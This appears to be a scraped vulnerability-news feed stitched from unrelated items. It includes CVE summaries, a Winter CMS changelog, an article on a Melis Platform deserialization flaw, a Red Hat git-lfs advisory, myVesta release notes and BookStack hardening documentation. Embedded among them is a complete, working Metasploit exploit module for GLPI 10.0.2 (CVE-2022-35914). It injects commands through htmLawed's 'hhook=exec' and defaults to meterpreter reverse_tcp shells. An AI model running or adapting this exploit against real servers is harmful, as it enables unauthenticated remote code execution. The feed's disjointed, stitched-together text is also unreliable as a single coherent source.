A vulnerability classified as critical was found in SourceCodester eLearning System 1.0. This vulnerability affects unknown code of the file /admin/students/manage.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212014 is the identifier assigned to this vulnerability.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-3671: CVE_demo/eLearning System-SQL injections.md at main · anx0ing/CVE_demo

Winter is a free, open-source content management system based on the Laravel PHP framework. The Snowboard framework in versions 1.1.8, 1.1.9, and 1.2.0 is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. The 1.0 branch of Winter is not affected, as it does not contain the Snowboard framework. This issue has been patched in v1.1.10 and v1.2.1. As a workaround, one may avoid this issue by following some common security practices for JavaScript, including implementing a content security policy and auditing scripts.

**UX/UI Improvements**

*   Added support for streaming file uploads directly to S3 storage disks via the stream_uploads option on the disk configuration. Requires the Winter.DriverAWS plugin.
*   Added support for the data-request-parent attribute to the AJAX framework, allowing AJAX requests to include the data from the elements that spawned them which allows for highly complex workflows where popups spawn popups and then those popups need to call their own AJAX handlers but the page previously didn't know to initialize them without their parent data being present. This fixes support of the RecordFinder inside of popups like the RelationController's update & pivot forms as well as the FileUpload's description form popup inside of other popups.
*   Switched the winter:up / migrate commands to use the new Laravel CLI components for improved output formatting.
*   Added support for type: range Form fields.
*   Added support for the conditions property on List Columns with a relationship defined via the relation property.
*   Added support for changing an image's extension / file type when using the ImageResizer to resize the image.
*   Added support for ignoring specific Mix packages to avoid including third-party Mix packages in your application's package.json unnecessarily.
*   Clicking the label of a switch field will now toggle the switch.
*   Increased the width of the crop dimension inputs when cropping or resizing an image in the Media widget.
*   Standard HTML flash messages that are converted to JavaScript flash messages through Snowboard are now removed once converted, to prevent the original message from remaining even after the flash message is dismissed.
*   The autogenerated password for the default administrator account is now displayed in the winter:install command output and can be changed through the wizard.
*   Documented app.tempPath configuration option.
*   Added winter:password as an alias for winter:passwd.
*   Minor CSS improvements.

**API Changes**

*   Removed the default maxlength of 255 from type: text Form fields.
*   The twig.environment.cms Twig environment is no longer provided as a singleton, instead being generated on each request to App::make(). This helps to avoid conflicts when calling the CMS controller multiple times in the same request.
*   Deprecated the Winter\Storm\Database\Behaviors\Purgeable behavior as the Purgeable trait is now included by default on all Winter models.
*   Added the backend.formwidgets.fileupload.onUpload event to allow for custom handling of file uploads in the FileUpload FormWidget.
*   Added the backend.widgets.uploadable.onUpload event to allow for custom handling of file uploads in the widgets that implement the Backend\Traits\UploadableWidget trait.
*   Added the formwidgets.fileupload.initUploader Snowboard global JS event to allow for interacting with the FileUpload's JS uploader instance.
*   Added the formwidgets.richeditor.init Snowboard global JS event to allow for interacting with the RichEditor's JS editor instance.
*   Added the widgets.mediamanager.initUploader Snowboard global JS event to allow for interacting with the MediaManager's JS uploader instance.
*   Switched visibility of getRelationModel() from protected to public on the Backend\Traits\FormModelWidget trait.
*   Switched visibility of getOptionsFromModel() from protected to public on the Backend\Widgets\Form widget.
*   Added the following methods to the Backend\Traits\UploadableWidget trait to make it easier to customize upload behaviour:
    *   uploadableGetDisk()
    *   uploadableGetUploadPath()
    *   uploadableGetUploadUrl()
*   Added the following model relation events:
    *   model.relation.beforeAdd($relationName, $relatedModel)
    *   model.relation.afterAdd($relationName, $relatedModel)
    *   model.relation.beforeRemove($relationName, $relatedModel)
    *   model.relation.afterRemove($relationName, $relatedModel)
    *   model.relation.beforeAssociate($relationName, $relatedModel)
    *   model.relation.afterAssociate($relationName, $relatedModel)
    *   model.relation.beforeDisassociate($relationName)
    *   model.relation.afterDisassociate($relationName)
*   A new mix:run Artisan command has been added to allow scripts defined in the package.json file of a Mix package to be run easily through the CLI. You can find the documentation here.
*   The AJAX framework and Snowboard framework now both enforce either a class name dot (.) or an ID hash (#) to be prefixed to any partials that are to be updated in an AJAX response. This includes any mapped selectors.
*   Snowboard JavaScript AJAX requests now accept two or three parameters, similar to the old framework. When using two parameters, the user only needs to specify the handler and options - it is assumed in this case that the AJAX requests is detached and not tied to an element.
*   Added Winter\Storm\Database\Traits\HasSortableRelations trait to make it easier to sort related records on a model.
*   Added support for ** as a wildcard when setting the application's trusted proxies. This was originally supported in fideloper/trustedProxy but was removed without explanation in Laravel 5.6. * will trust the currently requesting IP address, ** will trust all proxies in a chain of proxies (often required if you are behind something like CloudFront and another proxy). This was required for retrieving the correct Client IP address when using Laravel Vapor.
*   Properties added to Model instances via addDynamicProperty() are now automatically added as purgeable attributes to prevent them from being saved to the database.
*   Added the Arr::moveKeyToIndex($array, $targetKey, $index) helper method to make it easier to move a specific array element to the specified index.
*   Added the Str::unique($str, $items, $separator, $step) helper method that ensures the provided string will be unique when compared to the provided array by adjusting the string with the separator & step as necessary. Useful for filename deplication or other deduplication of unique references.
*   Added the Str::join($items, $glue, $lastGlue, $dyadicGlue) helper method to join an array of items with a glue string, optionally using a different glue string for the last item and for the dyadic item case (only two items). By default this applies the "Oxford / Serial Comma" gramatical construct when listing items.
*   Added the fromStorage() helper method to the Winter\Storm\Database\Attach\File model class in order to create a new file record from a file path that already exists on the file model's storage disk.
*   Added new Winter\Storm\Console\Traits\HandlesCleanup trait to the base Winter Command class that makes it easier to implement cross-platform cleanup logic on your CLI commands when process termination signals are received.
*   Added support for root level paths in the Halcyon DbDatasource, required for Child Theme support.
*   Added support for exit codes in mix:compile. Also added support for the --silent, --stop-on-error, and --manifest flags.

**Bug Fixes**

*   The winter:test command now automatically uses the correct bootstrap file for unit testing, irrespective of the bootstrap configuration in any plugin or module's phpunit.xml file, to assist users migrating their unit tests to Winter 1.2.
*   Fixed issue where plugins weren't being correctly sorted by their dependencies when depending on a plugin that registers itself as a replacement which could cause migrations to run in the incorrect order.
*   Fixed typo in the MediaManager widget that was preventing SVGs from displaying their previews in the sidebar.
*   Fixed issue when attempting to generate a TailwindCSS theme scaffold on a case sensitive file system.
*   Fixed mismatching method signature on AutoDatasource->lastModified() that could cause issues when using DatabaseTemplates in v1.2.
*   Fixed issue where MorphedByMany relationships would use the wrong class name when building queries.
*   Removed an override to the Input::all() facade method, which prevented files from being included in the result, breaking previous behaviour.
*   Removed an extra 0 that was left over in numberrange filter partials.
*   Fixed an issue where only the last component would be saved in a CMS template due to the framework not correctly processing arrayed POST data.
*   Fixed an issue with the winter:fresh command where the demo plugin was not removed and an error message was shown.
*   The Array Source trait will no longer attempt to save a temporary SQLite DB if storage is disabled via setting $cacheArray to false.
*   Fixed an issue where custom AJAX error responses were being mangled by the Snowboard Request class, before sending off to the error handlers. If an error does not appear to be a PHP exception with an exception class and message, it will now pass through the response untouched (but still be considered an error response).
*   Fixed an issue where the File model's fromUrl() method would not correctly determine the file's mimeType if the file was delivered with a Content-Type header that was incorrectly capitalized.
*   Fixed an issue where migrations using anonymous classes could not be run more than once in a single process.
*   Fixed support for the Laravel ClassName@method syntax for event listeners.
*   Fixed issue where custom pivot models were not being used when using the attach method on a BelongsToMany relationship.
*   Fixed support for queueing emails (was broken by a change in Laravel 7 that was missed in the Winter v1.2 upgrade).
*   Fixed support for hidden files in Zip folders on systems without support for GLOB\_BRACE (Solaris, Alpine Linux, etc).
*   Fixed issue that occurred when attempting to dynamically add HasOneThrough|HasManyThrough relations to models.
*   Improved support for Winter < v1.2 mail configurations.
*   Fixed breaking change in Laravel 9.36 with the Winter\Storm\Console\Command's alert() method.
*   Fixed issue with identifying currently installed versions of plugins when the versions reported by the filesystem do not match exactly (i.e. with or without the "v" prefix) the versions reported by the database.
*   Fixed issue where Snowboard assets loaded via the {% snowboard %} Twig tag were not taking into account the configured app.asset_url of the application.
*   Fixed issue where the Status backend Dashboard Widget would break on clean installs.
*   Improved the reliability of the System's first boot date by storing it as a system parameter instead of relying on the oldest present plugin.
*   Fixed an issue where migrations were not ran if a notes output instance is not available to the migrator.
*   Fixed an issue where attempting to crop images with unsafe characters in their path would fail.
*   Fixed support for Winter Mix commands on Windows.
*   Fixed an issue where attempting to crop / resize images that were bigger than the viewport window would fail when using the TailwindUI backend skin.
*   Fixed issue when attempting to preview a CSV column with the ImportExportController behavior.
*   Fixed issue where the codeeditor and richeditor fields were not properly triggering change events when their contents were changed.
*   Fixed issue where custom error messages sent via AJAX and processed by Snowboard would not be properly handled.
*   Fixed issue where the jobs / failed_jobs table structure did not match that of Laravel 9.

**Security Improvements**

*   Prototype hardening has been implemented on the Snowboard framework to prevent prototype pollution. You may read the security advisory for more information.
*   Fixed issue where the AuthManager's persistence cookie was not respecting the configuration values set in config/session.php.
*   Added a new Svg helper class to make it easier to work with SVG files. Currently one method (extract()) is availabel which sanitizes and optionally minifies the provided SVG file making it safer to deal with.
*   Added migrate to the list of commands that require plugins to have the $elevated property set in order to run when the command is being run.

**Translation Improvements**

*   Fixed a misnamed language string for the custom editor HTML styles input.
*   Improved German translation.
*   Improved Vietanamese translation.
*   Improved Ukrainian translation.
*   Improved Russian translation.

**Performance Improvements**

*   Slightly optimised searching for used slugs with models using the Sluggable trait by runnning an "exists" query as opposed to a "count" query.

**Community Improvements**

*   The Winter CMS module sub-split is now automated, ensuring that the module repositories are now automatically updated with the latest changes as soon as they are committed to the main repository.
*   The base System\Tests\Bootstrap\PluginTestCase class has been signficantly refactored to improve testing in plugins. While it is mostly backwards-compatible, the method runPluginRefreshCommand is now deprecated and will be removed in the Winter CMS 1.3 branch. Please use the instantiatePlugin method instead if you have overridden the core plugin test case methods.

**Dependencies**

*   Moved the Laravel configuration file writing functionality out of the Winter\Storm library and into it's own standalone Winter\LaravelConfigWriter library. This was done in order to reuse it in the web installer, but also means that any Laravel application can take advantage of this package.
*   Made the Composer merge plugin less greedy by default, previously it would merge in all plugin composer.json files that existed in your project, now it will only merge in specific plugin paths defined in your project's composer.json. Copy the changes from GitHub in order to apply it to your projects.

**New Contributors**

*   @cstorus made their first contribution in #616
*   @simonmannsfeld made their first contribution in #623
*   @quangtrongonline made their first contribution in #636
*   @nathanlesage made their first contribution in #665
*   @vllvll made their first contribution in #669
*   @robertalexa made their first contribution in #668
*   @iamyigitkoc made their first contribution in #624
*   @hecc127 made their first contribution in #682
*   @prsuhas made their first contribution in #723

**Full Changelog**: v1.2.0...v1.2.1

CVE-2022-39357: Release v1.2.1 · wintercms/winter

The Kadence WooCommerce Email Designer WordPress plugin before 1.5.7 unserialises the content of an imported file, which could lead to PHP object injections issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.

CVE-2022-3335

POP chain crafted to demonstrate exploitability

Adam Bannister 25 October 2022 at 15:20 UTC

POP chain crafted to demonstrate exploitability

Melis Platform, the open source e-commerce and content management system (CMS), was vulnerable to remote code execution (RCE) via a critical deserialization vulnerability.

Tracked as CVE-2022-39297 and with a CVSS score of 9.8, the object injection flaw has been patched along with a pair of high severity bugs by French vendor Melis Technology.

Melis Platform is based on Laminas, a popular PHP framework formally known as Zend, and counts Keyrus, Paco Rabanne, and La Banque Postale among its users.

Read more of the latest PHP security news

The vulnerabilities were discovered by researchers from Swiss security outfit Sonar.

“The main vulnerability we identified comes from the deserialization of user data, something that is known to be unsafe for quite some time now,” Sonar vulnerability researcher Thomas Chauchefoin told The Daily Swig.

“As modern applications are very loosely coupled, it was not immediately obvious, even to an educated eye, that attackers could reach this code. This is where automated code analysis can be very powerful,” they added.

**‘Puzzle pieces’**

Having established the potential for abuse of PHP’s function with Sonar’s static analysis tool, the researchers tested exploitability by crafting a Property Oriented Programming (POP) chain.

“The fun thing about deserialization vulnerabilities in PHP is that not so many gadget chains are available when you adventure \[move\] yourself out of the usual targets; they are like small puzzle pieces you have to assemble to obtain code execution,” said Chauchefoin.

“We had to come up with a new chain for the framework Laminas. We added it to PHPGGC, a public database of the most common gadget chains, so other researchers don't have to do this work again!”

**Targeting the cache layer**

In a blog post, Chauchefoin and Sonar software engineer Karim El Ouerghemmi documented how they targeted Laminas’ cache layer.

“Cache systems are often good targets ‘because they are\] designed in a way to be loosely coupled with the rest of the application (e.g. automatically trigger save at the end of the lifecycle of the request by using destructors) and support a broad range of storage backends, including filesystems,” they wrote. “It can also be assumed that gaining the ability to control what's stored in the cache can be abused later upon its retrieval, this data is always considered to be trusted.”

The other high severity issues caught by Sonar’s researchers include CVE-2022-39296, an arbitrary file read bug, and CVE-2022-3929, a DMA re-entrancy vulnerability in the NVM Express Controller (NVME) emulation in QEMU that could lead to denial of service (DoS) or code execution.

Sonar reported the vulnerabilities to Melis Technology back in June 2021 and patched updates were released on September 23, 2022.

The flaws affect versions spanning 2.2.0 and 5.0.0 inclusive, and were remediated in Melis 5.0.1.

DON’T MISS HyperSQL DataBase flaw leaves library vulnerable to RCE

Melis Platform CMS patched for critical RCE flaw

This Metasploit module exploits an unauthenticated PHP command injection vulnerability in GLPI versions 10.0.2 and below to execute a command.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GLPI htmLawed php command injection',        'Description' => %q{          This exploit takes advantage of a unauthenticated php command injection available          from GLPI versions 10.0.2 and below to execute a command.        },        'License' => MSF_LICENSE,        'Author' => [          'cosad3s', # PoC https://github.com/cosad3s/CVE-2022-35914-poc          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2022-35914' ],          ['URL', 'https://github.com/cosad3s/CVE-2022-35914-poc']        ],        'Platform' => 'linux',        'Arch' => [ARCH_X64, ARCH_CMD],        'CmdStagerFlavor' => [ 'printf' ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',                'RPORT' => 80,                'URIPATH' => '/glpi/'              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'RPORT' => 80,                'URIPATH' => '/glpi/'              },              'Type' => :linux_dropper            }          ],        ],        'DisclosureDate' => '2022-01-26',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )  end  def populate_values    uri = "#{datastore['URIPATH']}/vendor/htmlawed/htmlawed/htmLawedTest.php"    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(uri),        'connection' => 'keep-alive',        'accept' => '*/*'      })      @html = res.get_html_document      @token = @html.at_xpath('//input[@id="token"]')['value']      vprint_status("token = #{@token}")      # sometimes I got > 1 sid.  We must use the last one.      @sid = res.get_cookies.match(/.*=(.*?);.*/)[1]      vprint_status("sid = #{@sid}")    rescue NoMethodError => e      elog('Failed to retrieve token or sid', error: e)    end  end  def execute_command(cmd, _opts = {})    populate_values if @sid.nil? || @token.nil?    uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri),      'cookie' => 'sid=' + @sid,      'ctype' => 'application/x-www-form-urlencoded',      'encode_params' => true,      'vars_post' => {        'token' => @token,        'text' => cmd,        'hhook' => 'exec',        'sid' => @sid      }    })  end  def check    populate_values if @html_doc.nil?    if @token.nil? || @sid.nil? || @html.nil?      return Exploit::CheckCode::Safe('Failed to retrieve htmLawed page')    end    return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed')    return Exploit::CheckCode::Safe('Unable to determine htmLawed status')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

GLPI 10.0.2 Command Injection

Red Hat Security Advisory 2022-7129-01 - Git Large File Storage replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: git-lfs security and bug fix update  
Advisory ID:       RHSA-2022:7129-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7129  
Issue date:        2022-10-25  
CVE Names:         CVE-2020-28851 CVE-2020-28852 CVE-2022-1705  
                   CVE-2022-27664 CVE-2022-30630 CVE-2022-30632  
                   CVE-2022-30635 CVE-2022-32148 CVE-2022-32189  
====================================================================  
1. Summary:

An update for git-lfs is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Git Large File Storage (LFS) replaces large files such as audio samples,  
videos, datasets, and graphics with text pointers inside Git, while storing  
the file contents on a remote server.

Security Fix(es):

* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing  
- -u- extension (CVE-2020-28851)

* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing  
bcp47 tag (CVE-2020-28852)

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)

* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)

* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)

* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)

* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)

* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* git-lfs needs to be rebuild with golang 1.17.7-1 or above

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension  
1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
git-lfs-2.13.3-3.el8_6.src.rpm

aarch64:  
git-lfs-2.13.3-3.el8_6.aarch64.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.aarch64.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.aarch64.rpm

ppc64le:  
git-lfs-2.13.3-3.el8_6.ppc64le.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.ppc64le.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.ppc64le.rpm

s390x:  
git-lfs-2.13.3-3.el8_6.s390x.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.s390x.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.s390x.rpm

x86_64:  
git-lfs-2.13.3-3.el8_6.x86_64.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.x86_64.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-28851  
https://access.redhat.com/security/cve/CVE-2020-28852  
https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fUXNzjgjWX9erEAQiGaA/9G7j5ZRTLXu5JnSUotGtxSKfo6wmJyMrK  
Er/pJphpzIR9+NhOSoPOaQvxTB6vDM2mswgeAe/0YDxocNjqX9bJz9NNnxEDVbQ1  
etXnXONyPmjvifZlYmDz3YkKq02y/GAPqdo8wcWSP77LwPaJQeMQ/cj9zH1Cxeqn  
1d7tVsX8atHL8pri3faMe6MdJTtHn9q9g9Adyq919ZxKxW5XeiYvTEXxmjLRhM/E  
IA5g0numQeeNOf5jNoA4g7a7yP4N1hiW03TLum4R5phkma2N8NIGvlXaHQU4FeV9  
pxvhHD6OSxtoAHNfvedJYGKGQO+sUVBd5CsodTFW31k5pClZ04C2TVuB9RiBdf5Z  
Ge6inwUonrBAtXQ8FT8HoG7gUgSC4bAV/2LRvJICKzdRZHnjlp0cdVNkxn7ElS6B  
pnUyX1i99HRNhU1ntJABizSXdQmtQqkXvme88j4WflTPPIthG60Noo2cp41GVHjJ  
22KArPU4eJSUI41O1qyjNOpyLLR2tgiw6IwYVjmEj8gwlp6rW6BFPrAxTZ+FVOW3  
Io4bWe4Aeq4E2fJcUATNejXNysyfZ7J0mgR1CpVjHzMvlb/T4BQQxX5/Ssb6Gj2l  
livwnwNtSdd0sFV03N/upoZFgiiwDBNZ3TC8Xl0vXJrXnvfAYVbbdC9Mergpp50p  
oYR8e+wj//E=1sLF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7129-01

myVesta Control Panel before 0.9.8-26-43 and Vesta Control Panel before 0.9.8-26 are vulnerable to command injection. An authenticated and remote administrative user can execute arbitrary commands via the v_sftp_license parameter when sending HTTP POST requests to the /edit/server endpoint.

*   \[Security\] fix for: CSRF remote code execution in UploadHandler.php - CVE-2021-28379 (Credits to: Fady Osman @fady\_othman)
*   \[Security\] fix for: Local privilege escalation from user account to admin account user via v-add-web-domain (Credits to: Two independent security researchers, Marti Guasch Jiménez and Francisco Andreu Sanz, working with the SSD Secure Disclosure program) (and also thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Local privilege escalation in v-generate-ssl-cert (potential user to admin or root escalation) (Credits to: Numan Türle @numanturle, thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Local privilege escalation in /web/api/ via v-make-tmp-file (probably admin to root escalation) (Credits to: Numan Türle @numanturle, thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Cross site scripting in /web/add/ip/ (admin to other admin XSS escalation) (Credits to: Numan Türle @numanturle, thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Admin to root escalation in v-activate-vesta-license (Credits to: Numan Türle @numanturle)
*   \[Security\] Ensure HTML will not be displayed in list log page (Credits to: Kristan Kenney @kristankenney, thanks to HestiaCP @hestiacp for fix)

CVE-2021-46850: Release Version 0.9.8-26-43 · myvesta/vesta

Cross-site scripting vulnerability in BookStack versions prior to v22.09 allows a remote authenticated attacker to inject an arbitrary script.

Since BookStack can hold important information for users you should be aware of any potential security concerns. Read through the below to ensure you have secured your BookStack instance. Note, The below only relates to BookStack itself. The security of the server BookStack is hosted on is not instructed below but should be taken into account.

If you’d like to be notified of new potential security concerns you can sign-up to the BookStack security mailing list. For reporting security vulnerabilities, please see the “Security” section of the project readme on GitHub.

*   Initial Security Setup
*   Multi-Factor Authentication
*   Securing Images
*   Attachments
*   User Passwords
*   JavaScript in Page Content
*   Web Crawler Control
*   Secure Cookies
*   Host Iframe Control
*   Iframe Source Control
*   Failed Access Logging
*   Untrusted Server Side Requests
*   Content Security Policy (CSP)
*   MySQL SSL Connection
*   Using BookStack Content Externally

**Initial Security Setup**

1.  Ensure you change the password and email address for the initial admin@admin.com user.
2.  Ensure only the public folder is being served by your webserver. Serving files above this folder opens up a lot of code that does not need to be public. Triple check this if you have installed BookStack within the commonly used /var/www folder.
3.  Ensure the database user you’ve used for BookStack has limited permissions for only accessing the database used for BookStack data.
4.  Check that you’ve set the APP_URL option in your .env file so that system generated URLs cannot be manipulated.
5.  Within BookStack, go through the settings to ensure registration and public access settings are as you expect.
6.  Review the user roles in the settings area.
7.  Read the below to further understand the security for images & attachments.

**Multi-Factor Authentication**

Any user can enable multi-factor authentication (MFA) on their account. Upon login they would then need to use an extra proof of identity to gain access. BookStack currently supports the following mechanisms:

*   TOTP (Time-based One-Time Passwords)
    *   Labelled as “Mobile App” (Google/Microsoft Authenticator etc…).
    *   Uses a SHA1 algorithm internally (Greater algorithms have poor cross-app compatibility).
*   Backup Codes
    *   These are a list of 16 one-time-use codes.
    *   Users will be warned once they have less than 5 codes remaining.

Secrets and values for these options are stored encrypted within the database.

Where required, MFA can be forced upon users via their roles. This can be found via a “Requires Multi-Factor Authentication” checkbox seen when editing a role. If a user does not already have an MFA method configured, they will be forced to set one up upon next login.

**Securing Images**

By default, Images are stored in a way which is publicly accessible which ensures performance while using BookStack. Listed below are a few options for increasing image security.

**Alternative Storage Options**

Review our file upload storage options documentation for image storage options that add addition access or permission control to image requests.

**Complex Urls**

In the settings area of BookStack you can find the option ‘Enable higher security image uploads?’. Enabling this will add a 16 character random string to the name of image files to prevent easy guessing of URLs. This increases security without potential performance concerns.

**Prevent Directory Indexes**

It’s important to ensure you disable ‘directory indexes’ to prevent unknown users from being able to navigate their way through your images. Here’s the configuration for NGINX & Apache if your server allows directory indexes:

**NGINX**

    1
    2
    3
    4
    5
    

    # By default indexes are disabled on Nginx but if you have them enabled
    # add this to your BookStack server block
    location /uploads {
           autoindex off;
    }
    

**Apache**

    1
    2
    3
    4
    5
    

    # Add this to your Apache BookStack virtual host if Indexes are enabled.
    # If .htaccess file are enabled then the below should already be active.
    <Location "/uploads">
        Options -Indexes
    </Location>
    

You can test that indexes are disabled by attempting to navigate to <your_bookstack_url>/uploads/images in the browser after having uploaded at least one image. You should not see a list of files but instead a BookStack “Not Found” page.

**Attachments**

Attachments, if not using Amazon S3, are stored in the storage/uploads directory. By default, unlike images, these are stored behind the application authentication layer so access depends on permissions you have set up at a role level and page level.

If you are using Amazon S3 for file storage then access will depend on your S3 permission settings. Unlike images, BookStack will not automatically attempt to make uploaded attachments publically accessible.

**User Passwords**

User passwords, if not using an alternative authentication method, are stored in the database. These are hashed using the standard Laravel hashing methods which use the Bcrypt hashing algorithm.

**JavaScript in Page Content**

By default, JavaScript tags within page content is escaped when rendered. This can be turned off by setting ALLOW_CONTENT_SCRIPTS=true in your .env file. Note that even if you disable this escaping the WYSIWYG editor may still perform it’s own JavaScript escaping. This option will also alter the CSP rules set by BookStack.

_**This option disables some fundamental cross-site-scripting protections. Only use this option on secure instances, where only very trusted users can edit content**_

**Web Crawler Control**

The rules found in the /robots.txt file are automatically controlled via the “Allow public viewing?” setting. This can be overridden by setting ALLOW_ROBOTS=false or ALLOW_ROBOTS=true in your .env file. If you’d like to customise the rules this can be done via theme overrides.

**Secure Cookies**

BookStack uses cookies to track sessions, remember logins and for XSRF protection. When using HTTPS you may want to ensure that cookies are only sent back to the browser if the connection is over HTTPS. If you have set a https APP_URL option in your .env this will enabled automatically but it can also be forced on by setting SESSION_SECURE_COOKIE=true in your .env file.

**Host Iframe Control**

By default BookStack will only allow itself to be embedded within iframes on the same domain as you’re hosting on. This is done through a CSP: frame-ancestors header. You can add additional trusted hosts by setting a ALLOWED_IFRAME_HOSTS option in your .env file like the example below:

    1
    2
    3
    4
    5
    

    # Adding a single host
    ALLOWED_IFRAME_HOSTS="https://example.com"
    
    # Multiple hosts can be separated with a space
    ALLOWED_IFRAME_HOSTS="https://a.example.com https://b.example.com"
    

Note: when this option is used, all cookies will served with SameSite=None (info) set so that a user session can persist within the iframe.

**Iframe Source Control**

By default BookStack will only allow certain other hosts to be used as src values for embedded iframe/frame content within the application. This is done through a CSP: frame-src header. You can configure the list of trusted sources by setting a ALLOWED_IFRAME_SOURCES option in your .env file like the examples below:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    

    # Adding a single host
    ALLOWED_IFRAME_SOURCES="https://example.com"
    
    # Multiple hosts can be separated with a space
    ALLOWED_IFRAME_SOURCES="https://a.example.com https://b.example.com"
    
    # Allow all sources
    # This opens vulnerability risk and should only be done in secure & trusted environments.
    ALLOWED_IFRAME_SOURCES="*"
    

By default this option is configured as follows:

    1
    

    ALLOWED_IFRAME_SOURCES="https://*.draw.io https://*.youtube.com https://*.youtube-nocookie.com https://*.vimeo.com"
    

Note: The source of ‘self’ will always be automatically added to this CSP rule. In addition, the host used for the diagrams.net integration (If enabled) will be automatically appended to the lists of hosts.

**Failed Access Logging**

